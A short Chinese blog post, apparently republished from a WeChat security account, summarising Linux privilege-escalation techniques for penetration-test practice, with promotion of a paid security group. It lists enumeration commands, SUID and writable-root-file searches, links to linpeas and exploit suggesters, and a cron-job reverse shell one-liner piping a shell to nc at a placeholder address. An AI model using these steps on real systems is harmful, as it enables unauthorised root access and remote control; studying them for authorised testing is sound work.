“ 总结。”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
提权思路
提取的思路:
1.内核提权:查看系统内核版本后,根据版本号查找CVE提取
常用命令:
cat /etc/issue
cat /etc/os-release
uname -a
2.SUID提取
常用命令和网站:
find / -perm -u=s -type f 2>/dev/null
https://gtfobins.github.io/
3.计划任务提权
写入计划任务的反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f"
常用工具:
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
4.查找ROOT权限文件并且其他用户有写入的权限:
find / -user root -type f -perm -o=rw -ls 2>/dev/null | grep -v "/proc"
比如/etc/passwd有权限写入,可以直接写入一个root用户进行提权
5.sudo错误配置提权
-l
6.常用自动化工具
linpeas提权脚本:
https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
linux-exploit-suggester-2
https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl
原文始发于微信公众号(道玄网安驿站):linux提权总结
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论